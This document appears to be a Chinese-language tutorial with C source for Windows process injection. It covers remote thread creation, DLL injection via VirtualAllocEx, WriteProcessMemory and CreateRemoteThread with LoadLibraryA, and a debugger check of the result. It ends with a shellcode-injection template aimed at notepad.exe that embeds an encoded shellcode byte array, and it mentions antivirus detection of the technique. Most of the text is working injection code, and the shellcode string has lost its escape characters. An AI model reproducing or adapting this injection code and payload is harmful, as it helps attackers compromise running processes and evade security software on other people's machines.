远程线程:
#include<windows.h>
#include<stdio.h>
//函数地址:00C31740
int main() {
HANDLE hThread;
HANDLE hProcess;
// 1、得到要在其进程中创建线程的进程句柄
hProcess = OpenProcess(PROCESS_ALL_ACCESS,false,10940);
if (hProcess == NULL) {
OutputDebugString("OpenProcess fail");
return -1;
}
// 2、通过进程句柄创建线程
hThread = CreateRemoteThread(
hProcess,
NULL, //获取默认的安全描述符,当前用户的令牌权限
0, //使用可执行文件的默认大小
(LPTHREAD_START_ROUTINE)0x010817E0, // 创建线程调用的函数
NULL, // 传递函数中的参数
0, //线程在创建后立即运行
NULL // 不返回线程标识符
);
if (hThread == NULL) {
OutputDebugString("CreateRemoteThread fail");
CloseHandle(hProcess);
return -1;
}
printf("线程启动!
");
// 3、释放资源
CloseHandle(hThread);
getchar(); //进行堵塞
return 0;
}
远程线程注入:
#include<Windows.h>
#include<Tlhelp32.h>
#include<stdio.h>
/*
远程线程注入
代码写的不太严谨,大家谅解
*/
DWORD GetOneProcessPid(const char *FileName) {
HANDLE hSnapShot;
PROCESSENTRY32 pro32;
pro32.dwSize = sizeof(PROCESSENTRY32);
// 1、获得当前进程的快照
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapShot == INVALID_HANDLE_VALUE) {
return -1;
}
bool bMore;
// 2、遍历进程的名称是否为指定名称,获取指定进程名称的PID
bMore = Process32First(hSnapShot, &pro32);
while (bMore) {
// 3、获取指定进程名称的PID
if (!strcmp(pro32.szExeFile, FileName)) {
return pro32.th32ProcessID;
}
bMore = Process32Next(hSnapShot, &pro32); //遍历
}
// 4、释放资源
CloseHandle(hSnapShot);
return 0;
}
DWORD WINAPI ThreadProc(LPVOID lpParameter) {
return 0;
}
bool LoadDll(DWORD ProcessPid,const char *DllPath) {
HANDLE hProcess;
DWORD DllPathLen;
PDWORD addr;
HMODULE hModule;
PDWORD FuncAddr;
// 1、获取要注入进程的句柄
hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, ProcessPid);
if (hProcess == NULL) {
return false;
}
// 2、获取DLL的信息
DllPathLen = strlen(DllPath) + 1; //+1的原因结尾需要 结尾
// 3、申请指定进程中的内存
addr = (PDWORD)VirtualAllocEx(
hProcess, //申请指定进程的句柄
NULL, // 安全描述符
DllPathLen, // 申请内存的字节大小
MEM_COMMIT, //
PAGE_READWRITE // 内存的属性
);
printf("%x", addr);
// 4、将DLL的信息写入到要注入的进程内存中
WriteProcessMemory(hProcess, addr, DllPath, DllPathLen, NULL);
// 5、要获取其进程的LoadLibraryA/W的函数地址,该函数保存在系统中的Kernel32.dll中,那么需要先获得Kernel32.dll的句柄
hModule = GetModuleHandle("Kernel32.dll");
// 6、从中获得LoadLibraryA/W的函数地址
FuncAddr = (PDWORD)GetProcAddress(hModule, "LoadLibraryA"); //返回值为函数地址
// 7、注入到指定进程中进行加载内存中申请的DLL信息,把LoadLibraryA的地址作为函数 来加载addr,也就是DLL的路径
CreateRemoteThread(hProcess, NULL, 0, LPTHREAD_START_ROUTINE(FuncAddr), addr, 0, NULL);
return true;
}
int main() {
LoadDll(GetOneProcessPid("x.exe"),"C:\Users\dell\Desktop\test\DLL2.dll");
return 0;
}
OD调试:
1、用OD附加被注入的进程
2、在代码printf("%x", addr);
,我这里显示的是如下
OD中数据窗口跟随00690000
,显示如下
此时注入程序已经走过了WriteProcessMemory
,到了GetProcAddrss
代码段
继续走完,然后OD F9一次,让被注入的进程跑起来,打开加载的模块窗口,发现模块中加载了DLL2.dll
,线程注入成功
shellcode注入的手段:被杀的很严重,估计是VirtualAllocEx
特征太明显
模板参考:
#include<Windows.h>
#include<Tlhelp32.h>
#include<stdio.h>
DWORD GetOneProcessPid(const char *FileName) {
HANDLE hSnapShot;
PROCESSENTRY32 pro32;
pro32.dwSize = sizeof(PROCESSENTRY32);
// 1、获得当前进程的快照
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapShot == INVALID_HANDLE_VALUE) {
return -1;
}
bool bMore;
// 2、遍历进程的名称是否为指定名称,获取指定进程名称的PID
bMore = Process32First(hSnapShot, &pro32);
while (bMore) {
// 3、获取指定进程名称的PID
if (!strcmp(pro32.szExeFile, FileName)) {
return pro32.th32ProcessID;
}
bMore = Process32Next(hSnapShot, &pro32); //遍历
}
// 4、释放资源
CloseHandle(hSnapShot);
return 0;
}
DWORD WINAPI ThreadProc(LPVOID lpParameter) {
return 0;
}
bool LoadShellcode(DWORD ProcessPid) {
HANDLE hProcess;
DWORD ShellcodeLen;
PDWORD addr;
char shellcode[] =
"xf6xe2x88x0ax0ax0ax6ax83xefx3bxcax6ex81x5ax3ax81x58x06x81x58x1ex81x78x22x05xbdx40x2cx3bxf5xa6x36x6bx76x08x26"
"x2axcbxc5x07x0bxcdxe8xf8x58x5dx81x58x1ax81x40x36x81x46x1bx72xe9x42x0bxdbx5bx81x53x2ax0bxd9x81x43x12xe9x30x43"
"x81x3ex81x0bxdcx3bxf5xa6xcbxc5x07x0bxcdx32xeax7fxfcx09x77xf2x31x77x2ex7fxeex52x81x52x2ex0bxd9x6cx81x06x41x81"
"x52x16x0bxd9x81x0ex81x0bxdax83x4ex2ex2ex51x51x6bx53x50x5bxf5xeax55x55x50x81x18xe1x87x57x62x39x38x0ax0ax62x7d"
"x79x38x55x5ex62x46x7dx2cx0dx83xe2xf5xdaxb2x9ax0bx0ax0ax23xcex5ex5ax62x23x8ax61x0axf5xdfx60x00x62x72x45x48x30"
"x62x08x0ax14x6bx83xecx5ax5ax5ax5ax4ax5ax4ax5ax62xe0x05xd5xeaxf5xdfx9dx60x1ax5cx5dx62x93xafx7ex6bxf5xdfx8fxca"
"x7ex00xf5x44x02x7fxe6xe2x6dx0ax0ax0ax60x0ax60x0ex5cx5dx62x08xd3xc2x55xf5xdfx89xf2x0ax74x3cx81x3cx60x4ax62x0a"
"x1ax0ax0ax5cx60x0ax62x52xaex59xefxf5xdfx99x59x60x0ax5cx59x5dx62x08xd3xc2x55xf5xdfx89xf2x0ax77x22x52x62x0ax4a"
"x0ax0ax60x0ax5ax62x01x25x05x3axf5xdfx5dx62x7fx64x47x6bxf5xdfx54x54xf5x06x2ex05x8fx7axf5xf5xf5xe3x91xf5xf5xf5"
"x0bxc9x23xccx7fxcbxc9xb1xfaxbfxa8x5cx60x0ax59xf5xdf";
// 1、获取要注入进程的句柄
hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, ProcessPid);
if (hProcess == NULL) {
return false;
}
// 2、获取shellcode的信息
ShellcodeLen = sizeof(shellcode); //+1的原因结尾需要 结尾
// 3、申请指定进程中的内存
addr = (PDWORD)VirtualAllocEx(
hProcess, //申请指定进程的句柄
NULL, // 安全描述符
ShellcodeLen, // 申请内存的字节大小
MEM_COMMIT, //
PAGE_READWRITE // 内存的属性
);
printf("%x", addr);
// 4、将shellcode的信息写入到要注入的进程内存中
WriteProcessMemory(hProcess, addr, shellcode, ShellcodeLen, NULL);
CreateRemoteThread(hProcess, NULL, 0, LPTHREAD_START_ROUTINE(addr), 0, 0, NULL);
return true;
}
int main() {
LoadShellcode(GetOneProcessPid("notepad.exe"));
return 0;
}